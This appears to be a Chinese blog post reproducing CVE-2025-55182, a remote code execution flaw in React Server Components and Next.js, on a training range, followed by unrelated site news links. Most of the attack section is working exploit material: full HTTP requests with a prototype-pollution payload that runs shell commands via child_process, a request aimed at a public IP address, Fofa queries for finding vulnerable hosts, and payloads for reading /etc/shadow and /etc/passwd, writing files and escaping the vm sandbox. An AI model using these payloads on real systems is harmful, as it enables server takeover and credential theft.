CVE-2025-55182复现
使用的是春秋云镜靶场进行的复现先讲怎么利用poc的然后在来探讨整个漏洞的形成、复现首先对网页进行一个抓包GET /install HTTP/2 Host: eci-2zeck0otubcneyef2pbq.cloudeci1.ichunqiu.com:3000 Cookie: localezh-Hans Cache-Control: max-age0 Sec-Ch-Ua: Chromium;v143, Not A(Brand;v24 Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: Windows Accept-Language: zh-CN,zh;q0.9 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Priority: u0, i![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/652b87a6ea59403c9d7bb0604d333386.png)然后根据poc进行一个改包POST /apps HTTP/2 Host: eci-2zeck0otubcneyef2pbq.cloudeci1.ichunqiu.com:3000 Cookie: localezh-Hans Cache-Control: max-age0 Sec-Ch-Ua: Chromium;v143, Not A(Brand;v24 Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: Windows Accept-Language: zh-CN,zh;q0.9 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Priority: u0, i Next-Action: x X-Nextjs-Request-Id: 91dmljym Content-Type: multipart/form-data; boundary----WebKitFormBoundaryx8jO2oVc6SWP3Sad X-Nextjs-Html-Request-Id: hst51Myl5trXfvWsC9Ay6 Content-Type: application/x-www-form-urlencoded Content-Length: 689 ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name0 {then:$1:__proto__:then,status:resolved_model,reason:-1,value:{\then\:\$B1337\},_response:{_prefix:var resprocess.mainModule.require(child_process).execSync(id).toString().trim();;throw Object.assign(new Error(NEXT_REDIRECT),{digest: NEXT_REDIRECT;push;/login?a${res};307;});,_chunks:$Q2,_formData:{get:$1:constructor:constructor}}} ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name1 $0 ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name2 [] ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--然后发现id得到了验证就是验证了漏洞所在所以进行一个cat /flag拿到flag下面的poc就是本次复现的是我之前整合在一起的但是是哪位老师的不记得了pocFofa使用RSC的包含js语法body“react.production.min.js” || body“React.createElement(” || body“React Router” || body“React.js”nextJs语法app“NEXT.JS”difyapp“Dify”漏洞说明任何捆绑了 react-server 实现的框架或库都可能存在漏洞React ServerReact Server 19.0.0React Server 19.0.1React Server 19.1.*React Server 19.2.0Next.jsNext.js v15.0.0 - v15.0.4Next.js v15.1.0 - v15.1.8Next.js v15.2.x -v15.5.6Next.js v16.0.0 - v16.0.6Next.js v14.3.0-canary.77及以上Canary 版本其他用到的框架不全RedwoodSDK、Waku、RedwoodJS (rwsdk)、React RouterRSC 预览版、Parcel RSC 插件 (parcel/rsc)、Vite RSC 插件 (vitejs/plugin-rsc)漏洞攻击链的本质是利用服务器对用户输入验证不严的缺陷通过原型链或其他方式操纵程序的内部逻辑最终调用一个危险的代码执行函数如vm.runInThisContextfs#readFileSync并传入恶意参数最终实现逻辑应该为pocPOST /formaction HTTP/1.1 Host: Content-Type: multipart/form-data; boundary----Boundary Content-Length: 297 ------Boundary Content-Disposition: form-data; name$ACTION_REF_0 ------Boundary Content-Disposition: form-data; name$ACTION_0:0 Content-type:application/json { id: fs#readFileSync, bound: [/etc/shadow] } ------Boundary--dify参考tested on next.js 16.0.6, might need some changes to be applied to other RSC frameworksPOST /apps HTTP/1.1 Host: 43.160.252.242 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0 Next-Action: x X-Nextjs-Request-Id: b5dce965 Content-Type: multipart/form-data; boundary----WebKitFormBoundaryx8jO2oVc6SWP3Sad X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9 Content-Length: 565 ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name0 {then:$1:__proto__:then,status:resolved_model,reason:-1,value:{\then\:\$B1337\},_response:{_prefix:var resprocess.mainModule.require(child_process).execSync(id).toString().trim();;throw Object.assign(new Error(NEXT_REDIRECT),{digest: NEXT_REDIRECT;push;/login?a${res};307;});,_chunks:$Q2,_formData:{get:$1:constructor:constructor}}} ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name1 $0 ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name2 [] ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--github上pocejpir/CVE-2025-55182-POCCVE-2025-55182 POC执行shell命令whoami { id: child_process#execSync, bound: [whoami] } 阅读敏感文件 { id: fs#readFileSync, bound: [/etc/passwd] } 写入文件到磁盘 { id: fs#writeFileSync, bound: [/tmp/pwned.txt, CVE-2025-55182] } 执行任意JavaScript { id: vm#runInThisContext, bound: [process.mainModule.require(child_process).execSync(id).toString()] } 沙盒逃逸vm.runInNewContext { id: vm#runInNewContext, bound: [this.constructor.constructor(return process)().mainModule.require(child_process).execSync(whoami).toString()] }利用条件总的来说漏洞利用要满足以下非纯前端使用了React服务端组件RSC功能前后端不可分离简单的说就是全栈框架且使用RSC服务端功能或者使用React SSR和RSC服务才行漏洞学习其实poc上面也提到了只是我可能还想再详细的学习一下协议层React Flight首先网页有三个时代分别是传统网站PHP、JSP浏览器点一下服务器就会返回html语言的整个网页每刷新一次HTML会整个重新生成React SPA不会再次返回整个网页比如浏览器打开index.html只有一次以后的数据都是GET /api/chat ↓ { message:hello }就是json重新渲染dom不会重新返回整个html3. React Server ComponentsFlight拆分成组件树的形式每次就是把组件发给浏览器然后根据组件再去更新相应组件位置服务器收到后的第一件事情就是把Flight还原成JavaScript对象流程Browser │ ▼ Flight Payload │ ▼ Next.js │ ▼ Flight Decoder解析 │ ▼ JavaScript Object │ ▼ Server ActionCVE-2025-55182 的真正核心就发生在恢复JavaScript对象这一步是因为服务器把Flight数据恢复成JavaScript对象时对输入校验不足而导致的

相关新闻

如何通过G-Helper实现华硕笔记本性能与能效的完美平衡

如何通过G-Helper实现华硕笔记本性能与能效的完美平衡

如何通过G-Helper实现华硕笔记本性能与能效的完美平衡 【免费下载链接】g-helper Lightweight Armoury Crate alternative for Asus laptops with nearly the same functionality. Works with ROG Zephyrus, Flow, TUF, Strix, Scar, ProArt, Vivobook, Zenbook, Expertbook, R…

2026/7/21 19:44:09 阅读更多 →
零基础自学C语言|2027专升本考生的系统化学习攻略

零基础自学C语言|2027专升本考生的系统化学习攻略

零基础自学C语言|2027专升本考生的系统化学习攻略(附每周行动方案)正在自学、准备入门C语言的朋友,先别急着刷视频、敲代码,停下来看完这篇,帮你告别盲目学习!很多新手学C语言最大的误区&#x…

2026/7/21 19:44:11 阅读更多 →
2026年头部GEO公司横向对比评测:微盟星启核心指标全领先

2026年头部GEO公司横向对比评测:微盟星启核心指标全领先

一、引言GEO(生成式引擎优化)行业经过几年的快速发展,已经从早期的概念期进入到快速成长期。市场上涌现出了众多的GEO服务商,但经过市场的筛选与淘汰,头部效应已经开始显现。几家头部GEO公司凭借技术、资源、经验等优势…

2026/7/24 1:01:09 阅读更多 →

最新新闻

终极NCM解密工具指南:轻松解锁网易云音乐加密文件

终极NCM解密工具指南:轻松解锁网易云音乐加密文件

终极NCM解密工具指南:轻松解锁网易云音乐加密文件 【免费下载链接】ncmdump 项目地址: https://gitcode.com/gh_mirrors/ncmd/ncmdump 你是否在网易云音乐下载了喜欢的歌曲,却发现在其他播放器无法打开?NCM解密工具正是你的救星&…

2026/7/25 5:44:36 阅读更多 →
深度伪造检测:多模态融合与创新特征分析

深度伪造检测:多模态融合与创新特征分析

1. 项目背景与核心挑战深度伪造(Deepfake)技术近年来发展迅猛,从最初的换脸应用逐渐演变为能够生成高度逼真的虚假音视频内容。这项技术就像一把双刃剑——在影视制作、虚拟偶像等领域带来创新的同时,也给信息安全、社会信任带来了…

2026/7/25 5:44:36 阅读更多 →
RePKG:Wallpaper Engine壁纸素材终极提取和转换工具

RePKG:Wallpaper Engine壁纸素材终极提取和转换工具

RePKG:Wallpaper Engine壁纸素材终极提取和转换工具 【免费下载链接】repkg Wallpaper engine PKG extractor/TEX to image converter 项目地址: https://gitcode.com/gh_mirrors/re/repkg 你是否曾经在Wallpaper Engine中发现了一款惊艳的动态壁纸&#xff…

2026/7/25 5:44:36 阅读更多 →
AI短剧创作工具:零基础制作专业短视频

AI短剧创作工具:零基础制作专业短视频

1. 项目概述"马上短剧"是一款基于AI技术的开源短剧创作工具,它让普通人也能快速制作专业水准的短视频内容。这个工具特别适合自媒体创作者、小型工作室和内容创业者使用,不需要昂贵的设备和复杂的后期制作流程,就能产出高质量的短视…

2026/7/25 5:44:36 阅读更多 →
专业陪练提升中文影子跟读训练效果

专业陪练提升中文影子跟读训练效果

1. 同声传译训练项目概述今天要分享的是一个针对口译学习者的中文影子跟读训练项目。这个项目的特别之处在于,我们邀请到了一位专业背景扎实的练习搭档——香港理工大学翻译硕士毕业,雅思7.5分的优秀译员作为陪练。影子练习(shadowing)作为同传训练的基础…

2026/7/25 5:44:36 阅读更多 →
RM57L843微控制器CPU自测试与时钟系统架构深度解析

RM57L843微控制器CPU自测试与时钟系统架构深度解析

1. 项目概述与核心价值在汽车电子、工业控制这些对可靠性要求极高的领域,一块芯片的“健康”与否,直接关系到整个系统的生死存亡。想象一下,一辆高速行驶的汽车,其电子稳定系统(ESP)或刹车控制单元&#xf…

2026/7/25 5:43:36 阅读更多 →

日新闻

突破文档下载限制:kill-doc让你看到的都能保存

突破文档下载限制:kill-doc让你看到的都能保存

突破文档下载限制:kill-doc让你看到的都能保存 【免费下载链接】kill-doc 看到经常有小伙伴们需要下载一些免费文档,但是相关网站浏览体验不好各种广告,各种登录验证,需要很多步骤才能下载文档,该脚本就是为了解决您的…

2026/7/25 0:00:35 阅读更多 →
C++ string类模拟实现:从深拷贝到内存管理的完整指南

C++ string类模拟实现:从深拷贝到内存管理的完整指南

1. 项目概述:为什么我们要“手撕”string类?在C的学习道路上,尤其是从C语言过渡到C的“初阶”阶段,string类绝对是一个绕不开的核心。标准库里的std::string用起来太方便了,、find、substr,几个操作符和函数…

2026/7/25 0:00:35 阅读更多 →
三角洲寻宝鼠工具:高效文件搜索与资源管理实战指南

三角洲寻宝鼠工具:高效文件搜索与资源管理实战指南

1. 先搞清楚“三角洲寻宝鼠”到底是什么工具从名称来看,“三角洲寻宝鼠”更像是一个资源查找或文件检索类工具,而不是游戏或娱乐软件。这类工具的核心价值在于帮助用户快速定位特定资源,比如文档、图片、压缩包或特定格式的文件。如果你经常需…

2026/7/25 0:00:35 阅读更多 →

周新闻

Go语言静态资源打包方案对比与实践指南

Go语言静态资源打包方案对比与实践指南

1. 项目背景与核心需求在Go语言开发中,我们经常需要处理静态资源文件的打包问题。无论是Web应用的模板文件、前端资源,还是配置文件、证书等,都需要随程序一起分发。传统做法是将这些文件与编译后的二进制文件放在同一目录下,但这…

2026/7/25 5:08:22 阅读更多 →
Go语言实现高性能LDAP认证服务的架构与实践

Go语言实现高性能LDAP认证服务的架构与实践

1. 项目背景与核心价值LDAP(轻量级目录访问协议)作为企业级身份认证的黄金标准,已经服务了超过80%的财富500强公司。我在金融科技领域实施统一认证体系时,发现传统Java方案存在启动慢、内存占用高等痛点。而Go语言凭借其协程并发模…

2026/7/25 5:13:53 阅读更多 →
【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

更多请点击: https://intelliparadigm.com 第一章:AI面试官实战指南的核心价值与适用场景 AI面试官并非替代人类HR的“黑箱工具”,而是以可解释、可审计、可迭代的方式,赋能招聘全链路的关键基础设施。其核心价值在于将主观经验沉…

2026/7/24 18:52:18 阅读更多 →

月新闻